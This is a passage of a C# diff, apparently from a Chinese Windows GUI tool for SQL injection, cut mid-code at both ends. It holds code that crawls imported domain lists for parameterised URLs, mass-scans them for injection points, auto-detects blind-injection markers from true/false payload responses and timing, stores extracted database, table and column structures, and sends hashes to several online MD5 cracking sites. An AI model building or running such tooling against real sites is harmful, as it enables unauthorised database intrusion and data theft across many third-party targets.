+ if (this.encode_cbox_encode.SelectedIndex != 0)
+ {
+
+ if (String.IsNullOrEmpty(encode))
+ {
+ MessageBox.Show("请输入要编码的字符!");
+ this.encode_txt_input.Focus();
+ }
+ }
+
+ switch (this.encode_cbox_encode.SelectedIndex)
+ {
+ case 1:
+ this.encode_txt_result.Text = System.Web.HttpUtility.UrlEncode(encode);
+ break;
+ case 2:
+ this.encode_txt_result.Text = Convert.ToBase64String(Encoding.UTF8.GetBytes(encode));
+ break;
+ case 3:
+ this.encode_txt_result.Text = Tools.stringToAscii(encode);
+ break;
+ case 4:
+ this.encode_txt_result.Text = Tools.strToHex(encode, "UTF-8");
+ break;
+ case 5:
+
md5();
+ break;
+
+ }
+ }
+ catch (Exception ep)
+ {
+
+ log("编码发生异常!" + ep.Message);
+
+ }
+ }
+
+ private void encode_cbox_decode_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ try
+ {
+ String decode = this.encode_txt_input.Text;
+ if (this.encode_cbox_decode.SelectedIndex != 0)
+ {
+
+ if (String.IsNullOrEmpty(decode))
+ {
+ MessageBox.Show("请输入要解码的字符!");
+ this.encode_txt_result.Focus();
+ }
+ }
+
+ switch (this.encode_cbox_decode.SelectedIndex)
+ {
+ case 1:
+ this.encode_txt_result.Text = System.Web.HttpUtility.UrlDecode(decode);
+ break;
+ case 2:
+ this.encode_txt_result.Text = Encoding.UTF8.GetString(Convert.FromBase64String(decode));
+ break;
+ case 3:
+ MessageBox.Show("多个ascii需使用空格隔开!");
+ this.encode_txt_result.Text = Tools.asciiToString(decode);
+ break;
+ case 4:
+ this.encode_txt_result.Text = Tools.unHex(decode, "UTF-8");
+ break;
+ case 5:
+ log("----------------正在进行在线MD5解密----------------");
+ log("----------------正在查找www.cmd5.com---------------");
+ this.encode_txt_result.Text = "";
+ this.encode_txt_result.Text += "www.cmd5.com查询结果:" + OnlineMD5.decodeMD5_cmd5(this.encode_txt_input.Text) + "\r\n";
+ log("----------------正在查找www.md5.com.cn--------------");
+ this.encode_txt_result.Text += "www.md5.com.cn查询结果:" + OnlineMD5.decodeMD5_md5_com_cn(this.encode_txt_input.Text) + "\r\n";
+ log("---------------正在查找www.xmd5.org----------------");
+ this.encode_txt_result.Text += "www.xmd5.org查询结果:" + OnlineMD5.decodeMD5_xmd5_org(this.encode_txt_input.Text) + "\r\n";
+ log("---------------正在查找www.somd5.com---------------");
+ this.encode_txt_result.Text += "www.somd5.com查询结果:" + OnlineMD5.decodeMD5_somd5_com(this.encode_txt_input.Text) + "\r\n";
+ log("---------------正在查找www.md5.cc------------------");
+ this.encode_txt_result.Text += "www.md5.cc查询结果:" + OnlineMD5.decodeMD5_md5_cc(this.encode_txt_input.Text) + "\r\n";
+ log("---------------正在查找www.pmd5.com------------------");
+ this.encode_txt_result.Text += "www.pmd5.cm查询结果:" +
OnlineMD5.decodeMD5_pmd5_com(this.encode_txt_input.Text);
+ break;
+
+ }
+ }
+ catch (Exception ep)
+ {
+
+ log("解码发生异常!" + ep.Message);
+ }
+ }
+ public void checkTheKey(ServerInfo trueServer, ServerInfo falseServer, ServerInfo oldServer)
+ {
+
+ //判断关键字,body中的词
+ String key = Tools.findKeyByStr(trueServer.body, falseServer.body, oldServer.body);
+ this.chk_inject_reverseKey.Checked = false;
+ //如果为空反过来查找
+ if (String.IsNullOrEmpty(key))
+ {
+ this.Invoke(new StringDelegate(log), "Body响应内容中正向查找未发现盲注关键字!");
+ this.chk_inject_reverseKey.Checked = true;
+ key = Tools.findKeyByStr(falseServer.body, trueServer.body, oldServer.body);
+ if (String.IsNullOrEmpty(key))
+ {
+ this.Invoke(new StringDelegate(log), "Body响应内容中反向查找未发现盲注关键字!");
+ this.chk_inject_reverseKey.Checked = false;
+ }
+ }
+ if (!String.IsNullOrEmpty(key))
+ {
+ this.cbox_inject_type.SelectedIndex = 0;
+ this.txt_inject_key.Text = key;
+ this.Invoke(new StringDelegate(log), "发现盲注关键字!" + key);
+ return;
+ }
+
+ //状态码判断
+ int code = Tools.findKeyByCode(trueServer.code, falseServer.code);
+ if (code == 0)
+ {
+ this.Invoke(new StringDelegate(log), "响应状态码不能作为盲注判断条件!");
+
+ }
+ else
+ {
+ this.cbox_inject_type.SelectedIndex = 1;
+ this.txt_inject_key.Text = key;
+ this.Invoke(new StringDelegate(log), "响应状态码可以作为盲注判断条件!");
+ return;
+ }
+
+ //时间判断
+
+ if (trueServer.runTime < config.maxTime && falseServer.runTime < config.maxTime)
+ {
+ this.cbox_inject_type.SelectedIndex = 2;
+ this.txt_inject_key.Text = config.maxTime.ToString();
+ this.Invoke(new StringDelegate(log), "逻辑为真的响应时间可以作为盲注判断条件!");
+ return;
+ }
+ if (falseServer.runTime < config.maxTime && trueServer.runTime < config.maxTime)
+ {
+ this.cbox_inject_type.SelectedIndex = 2;
+ this.txt_inject_key.Text = config.maxTime.ToString();
+ this.chk_inject_reverseKey.Checked = true;
+ this.Invoke(new StringDelegate(log), "逻辑为假的响应时间可以作为盲注判断条件!");
+ return;
+ }
+ this.Invoke(new StringDelegate(log), "没有发现盲注判断条件,请检查注入标记、编码等基础配置是否正确!");
+ }
+
+ private void
inject_btn_autoFindKey_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ if (config.request.IndexOf(setInjectStr) == -1)
+ {
+
+ MessageBox.Show("大侠,请标记注入后,程序才能自动查找关键字!");
+ return;
+ }
+ if (config.request.IndexOf("") == -1)
+ {
+
+ MessageBox.Show("大侠,请将注入标记范围内参数标记编码,程序才能对标记编码范围内的数据进行URL编码,否则有错误!");
+ return;
+ }
+ this.inject_btn_autoFindKey.Enabled = false;
+ ServerInfo trueServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, Comm.truePayload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ ServerInfo falseServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, Comm.falsePayload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ checkTheKey(trueServer, falseServer, trueServer);
+ this.Invoke(new StringDelegate(log), "自动查找关键字完成!");
+
+ }
+ catch (Exception ep)
+ {
+ this.Invoke(new StringDelegate(log), "自动查找关键字发生异常!" + ep.Message);
+ }
+ this.inject_btn_autoFindKey.Enabled = true;
+ }
+
+ private void scanInjection_importDomains_Click(object sender, EventArgs e)
+ {
+ if (addStatus == 0) {
+ OpenFileDialog ofd = new OpenFileDialog { Filter = "文本文件(*.txt)|*.txt" };
+ if (ofd.ShowDialog() == DialogResult.OK )
+ {
+ this.scan_list.Clear();
+ this.scanInjection_txt_domainsPath.Text = ofd.FileName;
+ addStatus = 1;
+ Thread th = new Thread(new ParameterizedThreadStart(addItemToScanDomain));
+ th.Start(ofd.FileName);
+ }
+ }
+ else {
+ MessageBox.Show("加载任务未完成。");
+ }
+ }
+ public int addStatus = 0;
+ public void addItemToScanDomain(Object path) {
+ this.scan_list = FileTool.readDomainToList(path.ToString(), true);
+ this.scanInjection_domainsCount.Text = this.scan_list.Count + "";
+ int i = 0;
+ comm_count = this.scan_list.Count;
+ foreach (String url in this.scan_list)
+ {
+ this.scanInject_lsb_links.Items.Add(url);
+ i++;
+ comm_currentCount = i;
+ }
+ addStatus = 0;
+ MessageBox.Show("加载列表完成!");
+ }
+
+
Thread scanedThread = null;
+
+
+ public void stopScan()
+ {
+ Main.status = -1;
+ this.scanInjection_btn_scan.Enabled = false;
+ this.scanInjection_btn_scan.Text = "正在停止";
+ while (MyThreadPool.getCurrentThreadCount() > 0)
+ {
+
+ Thread.Sleep(100);
+ }
+ this.scanInjection_btn_scan.Text = "开始扫描";
+ this.scanInjection_btn_scan.Enabled = true;
+ Main.status = 0;
+ Thread.CurrentThread.Abort();
+ }
+
+ public void stopSpider()
+ {
+ Main.status = -1;
+ this.scanInjection_btn_spider.Enabled = false;
+ this.scanInjection_btn_spider.Text = "正在停止";
+ while (MyThreadPool.getCurrentThreadCount() > 0)
+ {
+
+ Thread.Sleep(100);
+ }
+ this.scanInjection_btn_spider.Text = "爬行链接";
+ this.scanInjection_domainsCount.Text = this.scanInject_lsb_links.Items.Count.ToString();
+ this.scanInjection_btn_spider.Enabled = true;
+ Main.status = 0;
+ Thread.CurrentThread.Abort();
+ }
+ public void spider()
+ {
+ foreach (String url in scan_list)
+ {
+ //爬行
+ MyThreadPool.initThread(new ParameterizedThreadStart(spiderURLs), url, url + "----" + scanedDomain);
+ scanedDomain++;
+ }
+ stopSpider();
+ }
+ public void scan()
+ {
+ //扫描
+ HashSet testURL = new HashSet();
+ foreach (String url in this.scanInject_lsb_links.Items)
+ {
+ if (url.IndexOf("?") != -1)
+ {
+ if (!testURL.Contains(url))
+ {
+ testURL.Add(url);
+ MyThreadPool.initThread(new ParameterizedThreadStart(scanInject), url);
+ scanedURLSCount++;
+ }
+ else {
+ this.Invoke(new StringDelegate(log), url+"----此URL以检测过了,自动跳过!");
+ }
+ }
+ }
+ stopScan();
+ }
+ public int urlSumCount = 0;//待扫url
+ public int scanedURLSCount = 0;//已扫
+
+ public String GetOneURL(List mylist, int index) {
+ try
+ {
+ if (!String.IsNullOrEmpty(mylist[index]))
+ {
+ return mylist[index];
+ }
+ }
+ catch (Exception e) {
+
+ }
+
+ return "";
+ }
+
+ public void spiderURLs(object url)
+ {
+ try
+ {
+ Spider.config = config;
+ Spider sp = new Spider();
+ if (this.scanInect_chk_isSpider.Checked)
+ {
+ sp.findLinks(url.ToString());
+ }
+ else
+ {
+
sp.AllURL.Add(url.ToString());
+ }
+ int count = 0;
+ int s = sp.AllURL.Count;//第一次URL总数
+ int spindex = 0;//爬行下标
+ int index = 0;
+ HashSet addURLs = new HashSet();
+ do
+ {
+
+ if (index >= s)
+ {
+ //不够数量继续爬行
+ if (count < config.maxSpiderCount)
+ {
+ String surl = GetOneURL(sp.AllURL, spindex);
+ if (!String.IsNullOrEmpty(surl)) {
+ sp.findLinks(surl);
+ spindex++;
+ }
+ }
+ }
+
+ String curl = GetOneURL(sp.AllURL, index);
+ if (curl.IndexOf("?") != -1)
+ {
+ this.Invoke(new StringDelegate(addItemToListBox), curl);
+ count++;
+ }
+ index++;
+
+ } while (count < config.maxScanCount&&sp.AllURL.Count> spindex) ;
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "发生异常----" + e.Message);
+ }
+
+ }
+
+
+ public void scanInject(Object ourl)
+ {
+ Injection injection = InjectionTools.testInjection(ourl.ToString(), this.config, this.scanInect_chk_scanError.Checked);
+ if (injection.isInjection)
+ {
+ this.Invoke(new StringDelegate(log), ourl + "存在注入点!");
+ injectionURLCount++;
+ injection.url = ourl.ToString();
+ injection.index = injectionURLCount;
+ this.Invoke(new addScanInjectionResultDelegate(addScanInjectionResult), injection);
+ }
+ else
+ {
+ this.Invoke(new StringDelegate(log), ourl + "不存在注入点!");
+ }
+
+
+ }
+
+ delegate void addScanInjectionResultDelegate(Injection inj);
+ public void addScanInjectionResult(Injection inj)
+ {
+
+ ListViewItem lvi = new ListViewItem(inj.index + "");
+ lvi.SubItems.Add(inj.url);
+ lvi.SubItems.Add(inj.testUrl);
+ lvi.SubItems.Add(inj.paramName);
+ lvi.SubItems.Add(inj.injectType);
+ lvi.SubItems.Add(inj.dbType);
+ lvi.SubItems.Add(inj.remark);
+ this.scanInjection_lvw_result.Items.Add(lvi);
+ }
+
+ public int scanedDomain = 0;
+ private void timer_scanInjection_Tick(object sender, EventArgs e)
+ {
+ this.scanInjection_findURLSCount.Text = urlSumCount + "";
+ this.scanInjection_scanedURLSCount.Text = scanedURLSCount + "";
+ this.scanInjection_scanedDomainCount.Text = this.scanedDomain + "";
+ }
+
+ private
void openScanURL(int index) {
+ if (this.scanInjection_lvw_result.SelectedItems.Count == 0)
+ {
+ return;
+ }
+ string target = this.scanInjection_lvw_result.SelectedItems[0].SubItems[index].Text;
+
+ try
+ {
+
+ System.Diagnostics.Process.Start("IEXPLORE.EXE", target);
+
+ }
+ catch (Exception oe)
+ {
+ MessageBox.Show("无法打开IE---" + oe.Message);
+ }
+ }
+
+
+
+ private void scanInjection_lvw_result_DoubleClick(object sender, EventArgs e)
+ {
+ openScanURL(2);
+ }
+
+ private void scanInjection_cms_exportResult_Click(object sender, EventArgs e)
+ {
+
+ exportScanURL(null);
+ }
+
+
+ public void exportScanURL(int[] cols){
+ if (export == 0)
+ {
+ //保存文件
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "文本文件|*.txt";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ export = 1;
+ exportInjectData(saveFileDialog.FileName,cols);
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("请稍候,还有导出任务正在进行!");
+ }
+ export = 0;
+ }
+
+ public void exportInjectData(Object path,int[] cols)
+ {
+ try
+ {
+ FileStream fs = new FileStream(path.ToString(), FileMode.OpenOrCreate, FileAccess.Write);
+ StreamWriter sw = new StreamWriter(fs);
+ String columns = "";
+ if (cols==null)
+ {
+ foreach (ColumnHeader dc in this.scanInjection_lvw_result.Columns)
+ {
+ columns += (dc.Text + "#");
+ }
+ sw.WriteLine(columns);
+ }
+
+ foreach (ListViewItem sv in this.scanInjection_lvw_result.Items)
+ {
+ StringBuilder sb = new StringBuilder();
+ if (cols == null)
+ {
+ foreach (ListViewItem.ListViewSubItem subv in sv.SubItems)
+ {
+
+ sb.Append(subv.Text);
+ sb.Append("----");
+ }
+ }
+ else {
+
+
+ for (int i=0;i< cols.Length;i++)
+ {
+ sb.Append(sv.SubItems[cols[i]].Text);
+ sb.Append("----");
+ }
+ }
+
+ sb.Remove(sb.Length - 4, 4);
+ sw.WriteLine(sb.ToString());
+ }
+ sw.Close();
+ MessageBox.Show("导出完成!");
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("导出数据发生异常!"
+ e.Message);
+ MessageBox.Show("导出数据发生异常!");
+ }
+ export = 0;
+
+ }
+
+ private void scanInjection_cms_copyURL_Click(object sender, EventArgs e)
+ {
+ if (this.scanInjection_lvw_result.SelectedItems.Count == 0)
+ {
+ return;
+ }
+ Clipboard.SetText(this.scanInjection_lvw_result.SelectedItems[0].SubItems[1].Text);
+ MessageBox.Show("复制成功!");
+ }
+
+ private void scanInjection_cms_delThisLine_Click(object sender, EventArgs e)
+ {
+ if (this.scanInjection_lvw_result.SelectedItems.Count == 0)
+ {
+ return;
+ }
+ foreach (ListViewItem selitem in this.scanInjection_lvw_result.SelectedItems) {
+ this.scanInjection_lvw_result.Items.Remove(selitem);
+ }
+ }
+
+ private void scanInjection_cms_clearResult_Click(object sender, EventArgs e)
+ {
+ this.scanInjection_lvw_result.Items.Clear();
+ }
+
+ public void loadList(Object path)
+ {
+ //load
+ FileStream fs_dir = null;
+ StreamReader reader = null;
+ urlSumCount = 0;
+ try
+ {
+ fs_dir = new FileStream(path.ToString(), FileMode.Open, FileAccess.Read);
+
+ reader = new StreamReader(fs_dir);
+
+ String lineStr;
+
+ while ((lineStr = reader.ReadLine()) != null)
+ {
+ this.Invoke(new StringDelegate(addItemToListBox), lineStr);
+ urlSumCount++;
+ }
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog(e.Message);
+ }
+ finally
+ {
+ if (reader != null)
+ {
+ reader.Close();
+ }
+ if (fs_dir != null)
+ {
+ fs_dir.Close();
+ }
+ loadListStatus = 0;
+ }
+
+ }
+ public void addItemToListBox(String item)
+ {
+ if (!this.scanInject_lsb_links.Items.Contains(item)) {
+ this.scanInject_lsb_links.Items.Add(item);
+ urlSumCount++;
+ }
+ }
+
+ private void scanInjection_txtURLList_DoubleClick(object sender, EventArgs e)
+ {
+ if (loadListStatus == 0)
+ {
+ OpenFileDialog ofd = new OpenFileDialog { Filter = "文本文件(*.txt)|*.txt" };
+ if (ofd.ShowDialog() == DialogResult.OK)
+ {
+ this.scanInject_lsb_links.Items.Clear();
+ Thread th = new Thread(loadList);
+ loadListStatus = 1;
+ th.Start(ofd.FileName);
+ }
+ }
+ else
+ {
+
MessageBox.Show("上次导入任务还未结束,请稍后!");
+ }
+ }
+
+ private void encode_txt_encode_TextChanged(object sender, EventArgs e)
+ {
+ md5();
+ }
+
+ private void md5()
+ {
+ if (this.encode_cbox_encode.SelectedIndex == 5)
+ {
+ this.encode_txt_result.Text = "16位md5:" + Tools.md5_16(this.encode_txt_input.Text) + "\r\n32位md5:" + Tools.md5_32(this.encode_txt_input.Text);
+ this.encode_txt_result.Text += "\r\n小写16位md5:" + Tools.md5_16(this.encode_txt_input.Text).ToLower() + "\r\n小写32位md5:" + Tools.md5_32(this.encode_txt_input.Text).ToLower();
+ }
+ }
+
+ private void log_lvw_httpLog_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ if (this.log_lvw_httpLog.SelectedItems.Count > 0)
+ {
+ try
+ {
+ String tag = this.log_lvw_httpLog.SelectedItems[0].Tag.ToString();
+ this.log_txt_request.Text = FileTool.readFileToString(Tools.httpLogPath + tag + "-request.txt");
+ String response = FileTool.readFileToString(Tools.httpLogPath + tag + "-response.txt");
+ if (!String.IsNullOrEmpty(response))
+ {
+ int index = response.IndexOf("\r\n\r\n");
+
+ if (index != -1)
+ {
+ this.webBro_log.Stop();
+ this.webBro_log.ScriptErrorsSuppressed = true;
+ this.log_txt_response.Text = response;
+ String html = response.Substring(index, response.Length - index);
+ this.webBro_log.DocumentText = html;
+ }
+
+
+ }
+ else
+ {
+ MessageBox.Show("没有读到详细HTTP日志,可能上一次清除记录时已清除!");
+ }
+ }
+ catch (Exception ee)
+ {
+ Tools.SysLog("查看详细HTTP日志,发生异常----" + ee.Message);
+ }
+ }
+ }
+
+ private ListViewColumnSorter data_dbs_lvw_lvwColumnSorter;
+ private bool sort = false;
+ private void data_dbs_lvw_data_ColumnClick(object sender, ColumnClickEventArgs e)
+ {
+ // 创建一个ListView排序类的对象,并设置listView1的排序器
+ data_dbs_lvw_lvwColumnSorter = new ListViewColumnSorter();
+ if (sort == false)
+ {
+ sort = true;
+ data_dbs_lvw_lvwColumnSorter.Order = SortOrder.Descending;
+ }
+ else
+ {
+ sort = false;
+ data_dbs_lvw_lvwColumnSorter.Order = SortOrder.Ascending;
+ }
+ data_dbs_lvw_lvwColumnSorter.SortColumn = e.Column;
+
this.data_dbs_lvw_data.ListViewItemSorter = data_dbs_lvw_lvwColumnSorter;
+ }
+
+ private ListViewColumnSorter scanInjection_lvw_result_lvwColumnSorter;
+ private bool ss_sort = false;
+ private void scanInjection_lvw_result_ColumnClick(object sender, ColumnClickEventArgs e)
+ {
+ // 创建一个ListView排序类的对象,并设置listView1的排序器
+ scanInjection_lvw_result_lvwColumnSorter = new ListViewColumnSorter();
+
+ if (ss_sort == false)
+ {
+ ss_sort = true;
+ scanInjection_lvw_result_lvwColumnSorter.Order = SortOrder.Descending;
+ }
+ else
+ {
+ ss_sort = false;
+ scanInjection_lvw_result_lvwColumnSorter.Order = SortOrder.Ascending;
+ }
+ scanInjection_lvw_result_lvwColumnSorter.SortColumn = e.Column;
+ this.scanInjection_lvw_result.ListViewItemSorter = scanInjection_lvw_result_lvwColumnSorter;
+ }
+
+ private void btn_inject_clearRequest_Click(object sender, EventArgs e)
+ {
+ this.mytab.SelectTab(1);
+ data_cms_tsmi_getVariable_Click(null, null);
+ }
+
+ private void file_txt_result_KeyDown(object sender, KeyEventArgs e)
+ {
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void cmd_txt_result_KeyDown(object sender, KeyEventArgs e)
+ {
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void encode_txt_result_KeyDown(object sender, KeyEventArgs e)
+ {
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void bypass_chk_base64_CheckedChanged(object sender, EventArgs e)
+ {
+ config.base64 = this.bypass_chk_base64.Checked;
+ }
+
+ private void data_dbs_tsmi_addDBS_Click(object sender, EventArgs e)
+ {
+ addNode(1);
+
+ }
+
+ private void addNode(int type)
+ {
+
+ if (an != null)
+ {
+ an = new AddNode();
+ an.type = type;
+ an.tn = this.data_tvw_dbs.SelectedNode;
+ an.tvw = this.data_tvw_dbs;
+ an.ShowDialog();
+ }
+ else
+ {
+ an = new AddNode();
+ an.type = type;
+ an.tvw = this.data_tvw_dbs;
+
an.tn = this.data_tvw_dbs.SelectedNode;
+ an.ShowDialog();
+ }
+
+ }
+
+ private void data_dbs_tsmi_addTableOrColumn_Click(object sender, EventArgs e)
+ {
+ addNode(2);
+ }
+ private Thread spiderThread = null;
+ private void scanInjection_btn_spider_Click(object sender, EventArgs e)
+ {
+ if (addStatus != 0) {
+ MessageBox.Show("请稍候,还在加载地址列表!");
+ return;
+ }
+ if (this.scanInjection_btn_spider.Text.Equals("爬行链接"))
+ {
+ if (scan_list.Count <= 0)
+ {
+ MessageBox.Show("请导入域名!");
+ return;
+ }
+ if (MyThreadPool.getCurrentThreadCount() > 0)
+ {
+ MessageBox.Show("请稍候还有后台线程正在运行!");
+ return;
+ }
+ this.scanInject_lsb_links.Items.Clear();
+ spiderThread = new Thread(spider);
+ scanedDomain = 0;
+ this.scanInjection_btn_spider.Text = "停止爬行";
+ Main.status = 1;
+ spiderThread.Start();
+
+ }
+
+ else
+ {
+ if (this.spiderThread != null)
+ {
+ this.spiderThread.Abort();
+ Thread t = new Thread(stopSpider);
+ t.Start();
+ }
+ }
+ }
+
+ private void scanInjection_btn_scan_Click(object sender, EventArgs e)
+ {
+ if (addStatus != 0)
+ {
+ MessageBox.Show("请稍候,还在加载地址列表!");
+ return;
+ }
+ if (MyThreadPool.getCurrentThreadCount() <= 0)
+ {
+ if (this.scanInject_lsb_links.Items.Count > 0)
+ {
+
+ scanedURLSCount = 0;
+ this.scanInjection_btn_scan.Text = "停止扫描";
+ Main.status = 1;
+ scanedThread = new Thread(scan);
+ scanedThread.Start();
+ }
+ else {
+ MessageBox.Show("请先爬行或导入链接!");
+ }
+ }
+ else
+ {
+
+ if (this.scanedThread != null)
+ {
+ this.scanedThread.Abort();
+ Thread t = new Thread(stopScan);
+ t.Start();
+ }
+ }
+ }
+ private ListViewColumnSorter log_lvw_httpLog_lvwColumnSorter;
+ private bool log_sort = false;
+ private void log_lvw_httpLog_ColumnClick(object sender, ColumnClickEventArgs e)
+ {
+ // 创建一个ListView排序类的对象,并设置listView1的排序器
+ log_lvw_httpLog_lvwColumnSorter = new ListViewColumnSorter();
+ if (log_sort == false)
+ {
+ log_sort = true;
+ log_lvw_httpLog_lvwColumnSorter.Order = SortOrder.Descending;
+ }
+ else
+ {
+ log_sort = false;
+
log_lvw_httpLog_lvwColumnSorter.Order = SortOrder.Ascending;
+ }
+ log_lvw_httpLog_lvwColumnSorter.SortColumn = e.Column;
+ this.log_lvw_httpLog.ListViewItemSorter = log_lvw_httpLog_lvwColumnSorter;
+ }
+
+ private void cbox_basic_timeOut_TextChanged(object sender, EventArgs e)
+ {
+ config.timeOut = int.Parse(this.cbox_basic_timeOut.Text);
+ }
+
+ private void cbox_basic_encoding_TextChanged(object sender, EventArgs e)
+ {
+ config.encoding = this.cbox_basic_encoding.Text;
+ }
+
+ private void cbox_basic_threadSize_TextChanged(object sender, EventArgs e)
+ {
+ config.threadSize = int.Parse(this.cbox_basic_threadSize.Text);
+ MyThreadPool.setMaxThread(config.threadSize);
+ }
+
+ private void cbox_basic_reTryCount_TextChanged(object sender, EventArgs e)
+ {
+ config.reTry = int.Parse(this.cbox_basic_reTryCount.Text);
+ }
+
+ private void tsmi_exportScanInjectionURL_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ //保存文件
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "文本文件|*.txt";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ FileStream fs = new FileStream(saveFileDialog.FileName.ToString(), FileMode.OpenOrCreate, FileAccess.Write);
+ StreamWriter sw = new StreamWriter(fs);
+ foreach (String url in this.scanInject_lsb_links.Items)
+ {
+ sw.WriteLine(url);
+ }
+ sw.Close();
+ MessageBox.Show("导出完成!");
+ }
+
+ }
+ catch (Exception ee)
+ {
+
+ MessageBox.Show("导出异常!"
+ ee.Message);
+
+ }
+
+ }
+
+ private void tsmi_clearScanInjectionURL_Click(object sender, EventArgs e)
+ {
+ this.scanInject_lsb_links.Items.Clear();
+ this.scan_list.Clear();
+ this.scanInjection_domainsCount.Text = "0";
+ this.urlSumCount = 0;//待扫url
+ this.scanedURLSCount = 0;//已扫
+ this.scanedDomain = 0;//爬行到URL
+
+ }
+
+ private void encode_txt_input_KeyDown(object sender, KeyEventArgs e)
+ {
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void tsmi_readme_Click(object sender, EventArgs e)
+ {
+ MessageBox.Show("查看程序包!");
+ }
+
+ private void cbox_file_readFileEncoding_SelectedValueChanged(object sender, EventArgs e)
+ {
+ config.readFileEncoding = this.cbox_file_readFileEncoding.Text;
+ }
+
+ private void toolStrip1_TextChanged(object sender, EventArgs e)
+ {
+ config.db_encoding = this.data_dbs_cob_db_encoding.Text;
+ }
+
+ private void 版本ToolStripMenuItem_Click(object sender, EventArgs e)
+ {
+ MessageBox.Show("V1.0正式版----" + version);
+ }
+
+ private void data_dbs_tsmi_saveDTCStruct_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ DataBase dbs = new DataBase();
+ SerializableDictionary>> db_tables = new SerializableDictionary>>();
+ foreach (TreeNode db in this.data_tvw_dbs.Nodes)
+ {
+ SerializableDictionary> stable = new SerializableDictionary>();
+ if (db.Nodes.Count <= 0)
+ {
+ stable.Add("", new List());
+ }
+ foreach (TreeNode table in db.Nodes)
+ {
+ List columns = new List();
+ foreach (TreeNode column in table.Nodes)
+ {
+ columns.Add(column.Text);
+ }
+ stable.Add(table.Text, columns);
+ }
+ db_tables.Add(db.Text, stable);
+ }
+ dbs.tables = db_tables;
+ //保存文件
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "文本文件|*.xml";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ export = 1;
+ Thread eth = new Thread(exportData);
+ }
+ XML.saveDBS(saveFileDialog.FileName, dbs);
+ MessageBox.Show("保存成功!");
+ }
+ catch (Exception ke)
+ {
+
+
log("\r\n加载异常----" + ke.Message + "\r\n");
+ }
+ }
+
+ private void data_dbs_tsmi_loadDTCStruct_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ OpenFileDialog ofd = new OpenFileDialog { Filter = "XML文件(*.xml)|*.*" };
+ if (ofd.ShowDialog() == DialogResult.OK)
+ {
+
+ DataBase dbs = XML.readDBS(ofd.FileName);
+ foreach (KeyValuePair>> sdb in dbs.tables)
+ {
+ if (Tools.isExistsNode(this.data_tvw_dbs.Nodes, sdb.Key))
+ {
+ log("数据库" + sdb.Key + "已在列表中,无法再次添加如果要添加请先删除原数据库!");
+ continue;
+ }
+ TreeNode dbtn = new TreeNode(sdb.Key);
+ dbtn.Tag = "dbs";
+ foreach (KeyValuePair> tables in sdb.Value)
+ {
+ if (String.IsNullOrEmpty(tables.Key))
+ {
+ continue;
+ }
+ TreeNode tabletn = new TreeNode(tables.Key);
+ tabletn.Tag = "table";
+ dbtn.Nodes.Add(tabletn);
+ foreach (String column in tables.Value)
+ {
+ if (String.IsNullOrEmpty(column))
+ {
+ continue;
+ }
+ TreeNode columntn = new TreeNode(column);
+ columntn.Tag = "column";
+ tabletn.Nodes.Add(columntn);
+ }
+ }
+ this.data_tvw_dbs.Nodes.Add(dbtn);
+ }
+ MessageBox.Show("加载库表列信息成功!");
+ }
+ }
+ catch (Exception ke)
+ {
+
+ log("\r\n加载异常----" + ke.Message + "\r\n");
+ }
+ }
+
+ private void data_dbs_tsmi_clearDTCStruct_Click(object sender, EventArgs e)
+ {
+ this.data_tvw_dbs.Nodes.Clear();
+ }
+
+ private void cbox_inject_type_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ int c = this.cbox_inject_type.SelectedIndex;
+ switch (c)
+ {
+ case 0:
+ config.keyType = KeyType.Key;
+ break;
+ case 1:
+ config.keyType = KeyType.Code;
+ break;
+ case 2:
+ config.keyType = KeyType.Length;
+ break;
+ case 3:
+ config.keyType = KeyType.Time;
+ break;
+
+ }
+ }
+
+ private void tsmi_createGetTemplate_Click(object sender, EventArgs e)
+ {
+ this.txt_inject_request.Text = HTTP.getTemplate;
+ }
+
+ private void tsmi_createPOSTTemplate_Click(object sender, EventArgs e)
+ {
+ this.txt_inject_request.Text = HTTP.postTemplate;
+ }
+
+ private void tsmi_changeRequestMethod_Click(object sender, EventArgs e)
+ {
+
this.txt_inject_request.Text = Tools.changeRequestMethod(this.txt_inject_request.Text);
+ }
+
+ private void tsmi_clearColumns_Click(object sender, EventArgs e)
+ {
+ this.data_dbs_lvw_data.Clear();
+ }
+
+ private void tsmi_bugReport_Click(object sender, EventArgs e)
+ {
+ MessageBox.Show("邮箱反馈:1341413415@qq.com\r\nQQ群反馈:84978967");
+ }
+
+ private void data_dbs_cob_db_encoding_TextChanged(object sender, EventArgs e)
+ {
+ this.config.db_encoding = this.data_dbs_cob_db_encoding.Text;
+ }
+
+ private void cob_keyRepalce_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ config.keyReplace = this.cob_keyRepalce.SelectedIndex;
+ }
+
+ private void chk_reaplaceBeforURLEncode_CheckedChanged(object sender, EventArgs e)
+ {
